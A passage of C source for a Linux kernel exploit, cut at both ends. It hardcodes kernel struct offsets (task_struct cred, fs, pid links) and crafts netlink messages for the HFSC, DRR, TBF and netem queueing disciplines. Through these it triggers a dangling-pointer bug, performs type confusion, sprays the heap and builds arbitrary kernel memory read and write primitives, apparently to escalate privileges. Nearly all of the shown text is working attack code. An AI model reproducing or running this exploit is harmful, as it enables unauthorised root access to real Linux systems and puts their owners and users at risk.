offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 96 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 1032 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 224 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 80 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1608 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1512 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 1984 // offsetof(struct task_struct, cred) +#define FS_OFF 2064 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 48 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 0 + +#endif + +/* Traffic control handles */ +#define VULN_NETEM_HANDLE 0xdead0000 + +/* Size of disttable */ +#define DIST_SIZE 1020 + +#define TIMER_BASE 50000 +#define TIMER_INC 100 +#define LABEL_TO_VALUE(x) (TIMER_BASE + TIMER_INC*x) + +#define DRR_SPRAY 36 +#define NETEM_SPRAY 20 + +#define err_exit(s) do { perror(s); 
exit(EXIT_FAILURE); } while(0) + +int clog_len; +int curr_ns; +unsigned char msgbuf[65536]; + +/* Netlink Messages */ + +/* Traffic control message header */ +struct __attribute__((packed)) tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +}; + +/* Network interface message header */ +struct __attribute__((packed)) if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Set network interface up */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + +/* Add/modify an HFSC qdisc */ +struct __attribute__((packed)) hfsc_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + int def; +}; + +struct hfsc_qdisc_msg hfsc_qdisc_msg = { + { + .nlmsg_len = sizeof(struct hfsc_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 8, + .rta_type = TCA_OPTIONS, + }, +}; + +/* Add/modify an RSC HFSC class */ +struct __attribute__((packed)) rsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr rsc_hdr; + struct tc_service_curve rsc; +}; + +struct rsc_class_msg rsc_class_msg = { + { + .nlmsg_len = sizeof(struct rsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .rsc_hdr = { + .rta_len = 16, + .rta_type = 
TCA_HFSC_RSC, + }, + .rsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an FSC HFSC class */ +struct __attribute__((packed)) fsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; +}; + +struct fsc_class_msg fsc_class_msg = { + { + .nlmsg_len = sizeof(struct fsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an USC HFSC class */ +struct __attribute__((packed)) usc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; + struct rtattr usc_hdr; + struct tc_service_curve usc; +}; + +struct usc_class_msg usc_class_msg = { + { + .nlmsg_len = sizeof(struct usc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 36, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m2 = 1, + }, + .usc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_USC, + }, + .usc = { + .m2 = 1, + }, +}; + +/* Add/modify a DRR qdisc */ +struct __attribute__((packed)) drr_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; +}; + +struct drr_qdisc_msg drr_qdisc_msg = { + { + .nlmsg_len = sizeof(struct 
drr_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", +}; + +struct __attribute__((packed)) drr_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr quantum_hdr; + int quantum; +}; + +/* Add/modify a DRR class */ +struct drr_class_msg drr_class_msg = { + { + .nlmsg_len = sizeof(struct drr_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", + .options_hdr = { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .quantum_hdr = { + .rta_len = 8, + .rta_type = TCA_DRR_QUANTUM, + }, + .quantum = 65536, +}; + +/* Add/modify a TBF qdisc to let packets through */ +struct __attribute__((packed)) tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; +}; + +struct tbf_qdisc_msg tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 44, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .buffer = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1000000000, + }, + }, +}; + +/* Add/modify a TBF qdisc to wait for pkt_len-1 secs */ +struct __attribute__((packed)) stall_tbf_qdisc_msg { 
+ struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; + struct rtattr burst_hdr; + int burst; +}; + +struct stall_tbf_qdisc_msg stall_tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct stall_tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 52, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1, + }, + }, + .burst_hdr = { + .rta_len = 8, + .rta_type = TCA_TBF_BURST, + }, + .burst = 1, +}; + + +/* Add/modify a netem qdisc to delay the packet */ +struct __attribute__((packed)) delay_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; +}; + +struct delay_netem_qdisc_msg delay_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct delay_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 28, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + .latency = -1, + } +}; + +/* Add/modify a netem qdisc with many parameters. 
Used for type confusion */ +struct __attribute__((packed)) parms_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr ecn_hdr; + int ecn; + struct rtattr latency_hdr; + long latency; + struct rtattr jitter_hdr; + long jitter; + struct rtattr reorder_hdr; + struct tc_netem_reorder reorder; + struct rtattr corrupt_hdr; + struct tc_netem_corrupt corrupt; + struct rtattr rate_hdr; + struct tc_netem_rate rate; + struct rtattr rate64_hdr; + long rate64; + struct rtattr slot_hdr; + struct tc_netem_slot slot; +}; + +struct parms_netem_qdisc_msg parms_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct parms_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = { + .rta_len = 160, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + }, + .ecn_hdr = { + .rta_len = 8, + .rta_type = TCA_NETEM_ECN, + }, + .latency_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_LATENCY64, + }, + .jitter_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_JITTER64, + }, + .reorder_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_REORDER, + }, + .corrupt_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_CORRUPT, + }, + .rate64_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_RATE64, + }, + .rate_hdr = { + .rta_len = 20, + .rta_type = TCA_NETEM_RATE, + }, + .slot_hdr = { + .rta_len = 44, + .rta_type = TCA_NETEM_SLOT, + }, +}; + +/* Add/modify a netem qdisc with a slot_dist buffer */ +struct __attribute__((packed)) dist_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr dist_hdr; + char dist[DIST_SIZE]; +}; + +struct 
dist_netem_qdisc_msg dist_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct dist_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 32 + DIST_SIZE, + .rta_type = TCA_OPTIONS, + }, + .dist_hdr = { + .rta_len = 4 + DIST_SIZE, + .rta_type = TCA_NETEM_SLOT_DIST, + }, +}; + + +/* Add a basic filter */ +struct __attribute__((packed)) basic_filter_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr classid_hdr; + int classid; +}; + +struct basic_filter_msg basic_filter_msg = { + { + .nlmsg_len = sizeof(struct basic_filter_msg), + .nlmsg_type = RTM_NEWTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + .tcm_handle = 1, + .tcm_info = TC_H_MAKE(1 << 16, 3 << 8), + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "basic", + .options_hdr = + { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .classid_hdr = { + .rta_len = 8, + .rta_type = TCA_BASIC_CLASSID, + }, +}; + + +/* Delete all of a qdisc's filters */ +struct tf_msg del_filter_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a qdisc */ +struct tf_msg del_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a class */ +struct tf_msg del_class_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + 
{ + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Dump info for all qdiscs */ +struct tf_msg get_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_GETQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_DUMP, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + + +/* Syscall used to wait for RCU grace period */ +int membarrier(unsigned int flags, int cpu_id) { + return syscall(SYS_membarrier, flags, cpu_id); +} + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +struct sockaddr_in iaddr; +int nl_sock_fd, inet_sock_fd; +int nl_socks[4], inet_socks[4]; +void loopback_send (void) { + if (sendto(inet_sock_fd, "", 1, 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); +} + +/* Helper functions for sending netlink messages */ + +void netlink_write (int sock, struct nlmsghdr *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack = {}; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.nh.nlmsg_type == NLMSG_ERROR && ack.ne.error) { + errno = -ack.ne.error; + err_exit("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct nlmsghdr *m) { + m->nlmsg_flags &= ~NLM_F_ACK; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + m->nlmsg_flags |= NLM_F_ACK; +} + +int tc_add_qd (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_qd (int parent) { + struct tf_msg *m = &del_qdisc_msg; + m->tm.tcm_parent = parent; + netlink_write(nl_sock_fd, m); +} + +int tc_add_cl (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = 
parent; + m->tm.tcm_handle = parent | handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_cl (int handle) { + struct tf_msg *m = &del_class_msg; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); +} + +void tc_add_fl (struct basic_filter_msg *m, int clid) { + m->tm.tcm_parent = clid & 0xffff0000; + m->classid = clid; + netlink_write(nl_sock_fd, m); +} + +void tc_del_fl (int clid) { + struct tf_msg *m = &del_filter_msg; + m->tm.tcm_parent = clid & 0xffff0000; + netlink_write(nl_sock_fd, m); + +} + +void switch_ns (int ns) { + nl_sock_fd = nl_socks[ns - 1]; + inet_sock_fd = inet_socks[ns - 1]; + curr_ns = ns; +} + +/* Trigger the bug, creating a dangling pointer to parent class. + * Qdiscs must be configured so packet is enqueued at target class. */ +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} + +/* Functions for reading and writing kernel memory */ + +void write_netem_parms(int handle, int *parms, struct tc_netem_slot *slot) { + struct parms_netem_qdisc_msg *m = &parms_netem_qdisc_msg; + if (parms) { + m->latency = *(long *)&parms[0]; + m->jitter = parms[2]; + // parms[3] corresponds to unwritable memory + m->qopt.loss = parms[4]; + m->ecn = parms[5]; + m->qopt.limit = parms[6]; + // parms[7] corresponds to unwritable memory + m->qopt.gap = parms[8]; + m->qopt.duplicate = parms[9]; + m->reorder.probability = parms[10]; + m->corrupt.probability = parms[11]; + m->rate64 = *(long *)&parms[12]; + } + if (slot) + m->slot = *slot; + tc_add_qd(m, 0, handle); +} + +void read_netem_parms (int handle, char *buf) { + int nread, tread = 0; + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(int *)&msgbuf[i] == handle /* "netem" 
*/ + && *(long *)&msgbuf[i + 16] == 0x6d6574656e) { + off = i; + break; + } + } + + if (off != -1) { + memcpy(buf, msgbuf + off + 56, 8); // latency + memcpy(buf + 8, msgbuf + off + 68, 8); // jitter + memcpy(buf + 16, msgbuf + off + 36, 4); // loss + memcpy(buf + 20, msgbuf + off + 140, 4); // ecn + memcpy(buf + 24, msgbuf + off + 32, 4); // limit + memset(buf + 28, 0, 4); // counter (always zero) + memcpy(buf + 32, msgbuf + off + 40, 4); // gap + memcpy(buf + 36, msgbuf + off + 44, 4); // duplicate + memcpy(buf + 40, msgbuf + off + 96, 4); // reorder + memcpy(buf + 44, msgbuf + off + 108, 4); // corrupt + memcpy(buf + 48, msgbuf + off + 120, 8); // rate + } + memset(msgbuf, 0, sizeof(msgbuf)); +} + +long *stab_addr; +int stab_handle; +int stab_ns; +long stab_needle; +long stab_parms_buf[7], stab_slot_buf[5]; + +void setup_stab_read (int handle, long parms_kaddr, long slot_kaddr, int ns) { + int flags = 0x80; + memcpy((char *)stab_parms_buf + 9, &flags, 4); + slot_kaddr += 32; + memcpy((char *)stab_parms_buf + 33, &slot_kaddr, 8); + slot_kaddr -= 32; + + parms_kaddr += 48 - IFINDEX_OFF; + memcpy((char *)stab_parms_buf + 1, &parms_kaddr, 8); + parms_kaddr -= 48 - IFINDEX_OFF; + + stab_parms_buf[6] = 0xdeadbeef; // lower bytes of needle + + stab_slot_buf[1] = 0; // flags ; limit + stab_slot_buf[2] = parms_kaddr + 232; // ops + stab_slot_buf[3] = 0xbad57ab; // stab + stab_slot_buf[4] = 0; // hash + + stab_addr = &stab_slot_buf[3]; + stab_needle = stab_slot_buf[2] << 32 | stab_parms_buf[6]; + stab_handle = handle; + stab_ns = ns; +} + +void read_netem_stab (long needle, char *buf, int n) { + int nread, tread = 0; + + int old_ns = curr_ns; + switch_ns(stab_ns); + + netlink_write_noerr(nl_sock_fd, &get_qdisc_msg); + do { + if ((nread = read(nl_sock_fd, msgbuf + tread, sizeof(msgbuf))) == -1) + err_exit("[-] read"); + tread += nread; + } while (nread != 20); + tread -= 20; + + int off = -1; + for (int i = 0; i <= tread - sizeof(int); i++) { + if (*(long *)&msgbuf[i] == needle) 
{ + off = i; + break; + } + } + + n = n > 24 ? 24 : n; + if (off != -1) + memcpy(buf, msgbuf + off + STAB_OFF, n); + else + printf("[-] Failed to find stab\n"); + + memset(msgbuf, 0, sizeof(msgbuf)); + switch_ns(old_ns); +} + +long stab_read_8 (long addr) { + long val; + int old_ns = curr_ns; + switch_ns(stab_ns); + *stab_addr = addr - 32; + write_netem_parms(stab_handle, stab_parms_buf, stab_slot_buf); + tc_add_qd(&parms_netem_qdisc_msg, 0, stab_handle); + read_netem_stab(stab_needle, &val, 8); + switch_ns(old_ns); + return val; +} + +int vt_handle; +int vt_ns; +long vt_dist_p_kaddr; +void setup_vt_write (int handle, long addr, int ns) { + int old_ns = curr_ns; + vt_ns = ns; + switch_ns(vt_ns); + vt_handle = handle; + vt_dist_p_kaddr = addr + PRIVDATA_OFF + SLOT_DIST_OFF; + hfsc_qdisc_msg.def = 0; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x150000); + switch_ns(old_ns); +} + +long root_addr; +void vt_write_8 (long addr, long val) { + long parms[7] = {}, *hfsc_class, dist_kaddr; + + int old_ns = curr_ns; + switch_ns(vt_ns); + + hfsc_class = &dist_netem_qdisc_msg.dist[HFSC_CLASS_START]; + ((int *)hfsc_class)[LEVEL_OFF/4] = 1; + hfsc_class[PARENT_OFF/8] = addr - CL_CVTMIN_OFF; + hfsc_class[CL_VT_OFF/8] = val; + + tc_add_qd(&dist_netem_qdisc_msg, 0, vt_handle); + + dist_kaddr = stab_read_8(vt_dist_p_kaddr); + dist_kaddr += TABLE_OFF + HFSC_CLASS_START + VT_NODE_OFF; + memcpy((char *)parms + 1, &dist_kaddr, 8); + + write_netem_parms(vt_handle, parms, NULL); + loopback_send(); + + switch_ns(old_ns); +} + +/* Functions for setting timers */ + +int add_order[] = { 0, 1, 2, 4, 9, 3, 5, 11, 10, 13, 12, 15, 6, 7, 8, 14, 16, }; +#define NUM_NODES (sizeof(add_order)/sizeof(*add_order)) +#define NUM_NEG_NODES 20 +int timer_fds[NUM_NODES]; +int neg_timerfds[NUM_NEG_NODES]; +void init_timers () { + for (int i = 0; i < NUM_NODES - 2; i++) { + timer_fds[add_order[i]] = timerfd_create(CLOCK_MONOTONIC, 0); + if (timer_fds[add_order[i]] == -1) + err_exit("[-] timerfd_create"); + } + for (int i = 0; i < 
NUM_NEG_NODES; i++) { + neg_timerfds[i] = timerfd_create(CLOCK_MONOTONIC, 0); + if (neg_timerfds[i] == -1) + err_exit("[-] timerfd_create"); + } +} + +void add_neg_nodes (void) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(-1); + for (int i = 0; i < NUM_NEG_NODES; i++) { + if (timerfd_settime(neg_timerfds[i], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); + } +} + +void add_timer_node (long label) { + struct itimerspec t = {}; + t.it_value.tv_sec = LABEL_TO_VALUE(label); + if (timerfd_settime(timer_fds[label], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +void rm_timer_node (long val) { + struct itimerspec t = {}; + if (timerfd_settime(timer_fds[val], 0, &t, NULL) == -1) + err_exit("[-] timerfd_settime"); +} + +#define GR 0x61c88647u +#define QDISC_HASH(x) ((x)*GR >> 28) +long handle_to_kaddr (int handle, long netdevq_kaddr) { + long next_addr; + next_addr = stab_read_8(netdevq_kaddr + NET_DEVICE_OFF) + QDISC_HASH_TABLE_OFF; + next_addr = stab_read_8(next_addr + 8*QDISC_HASH(handle)); + while (next_addr) { + if ((int)stab_read_8(next_addr + HANDLE_OFF - QDISC_HLIST_OFF) == handle) + return next_addr - QDISC_HLIST_OFF; + next_addr = stab_read_8(next_addr); + } + return 0; +} + +int drr_spray_and_find (int parent) { + int drr_spray[DRR_SPRAY]; + + for (int i = 0; i < DRR_SPRAY; i++) + drr_spray[i] = tc_add_cl(&drr_class_msg, parent, i + 1); + + int target = 0; + for (int i = 0; i < DRR_SPRAY; i++) { + if (!target) { + tc_add_fl(&basic_filter_msg, drr_spray[i]); + loopback_send(); + if (recv(inet_sock_fd, &msgbuf, 1, MSG_DONTWAIT) != -1) { + target = drr_spray[i]; + printf("[+] Found target DRR class %x\n", target); + continue; + } + tc_del_fl(drr_spray[i]); + } + tc_del_cl(drr_spray[i]); + } + + if (!target) + printf("[-] DRR spray on %x failed\n", parent); + + return target; +} + +int add_qdisc_timer_node (int parent, int root, int *spray_handles, + int spray_hash, int label, int ns_outer, int ns_inner) { + + /* Handles of 
the current leaf of the three branches, and handle of tbf qdisc's parent */ + int b1, b2, b3, pin, tbfp; + + switch_ns(ns_outer); + + /* Add subtree root */ + hfsc_qdisc_msg.def = 1; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + /* Set up upper layers */ + b1 = tc_add_cl(&rsc_class_msg, root, 1); + b1 = tc_add_qd(&drr_qdisc_msg, b1, 0xffff0000); + pin = tc_add_cl(&drr_class_msg, b1, 2); + b1 = tc_add_cl(&drr_class_msg, b1, 1); + + switch_ns(ns_inner); + b2 = tc_add_qd(&drr_qdisc_msg, -1, root + 0x30000); + switch_ns(ns_outer); + + b3 = tc_add_cl(&fsc_class_msg, root, 3); + b3 = tc_add_qd(&drr_qdisc_msg, b3, root + 0x40000); + tc_add_fl(&basic_filter_msg, b3 | 1); + + /* Create dangling pointer above TBF qdisc */ + tc_add_fl(&basic_filter_msg, b1); + trigger_vuln(b1); + + tc_del_fl(b1); + tc_add_fl(&basic_filter_msg, pin); + trigger_vuln(pin); + + hfsc_qdisc_msg.def = 3; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + tc_del_cl(b1); // Create dangling pointer + switch_ns(ns_inner); + tbfp = tc_add_cl(&drr_class_msg, b2, 1); + + /* Spray to prevent a later allocation + accidentally going under the dangling pointer + in case the allocation above missed it */ + for (int i = 1; i < DRR_SPRAY; i++) + tc_add_cl(&drr_class_msg, b2, i + 1); + tc_add_fl(&basic_filter_msg, tbfp); + + /* Add TBF qdisc */ + b2 = tc_add_qd(&tbf_qdisc_msg, tbfp, root + 0x50000); + b2 = tc_add_qd(&drr_qdisc_msg, b2, 0xffff0000); + tc_add_fl(&basic_filter_msg, b2 | 1); + + /* Create dangling pointer under TBF qdisc */ + b2 = tc_add_cl(&drr_class_msg, b2, 1); + + trigger_vuln(b2); + + tc_del_fl(tbfp); + tc_del_cl(b2); // Create dangling pointer + switch_ns(ns_outer); + b3 = drr_spray_and_find(b3); + + if (!b3) { + tc_del_qd(-1); + switch_ns(ns_inner); + tc_del_qd(-1); + switch_ns(ns_outer); + return 1; + } + + + switch_ns(ns_inner); + + for (int i = 0; i < clog_len; i++) + tc_add_cl(&drr_class_msg, 0xffff0000, i + 2); + + tc_add_qd(&stall_tbf_qdisc_msg, tbfp, 0); + + switch_ns(ns_outer); + + /* 
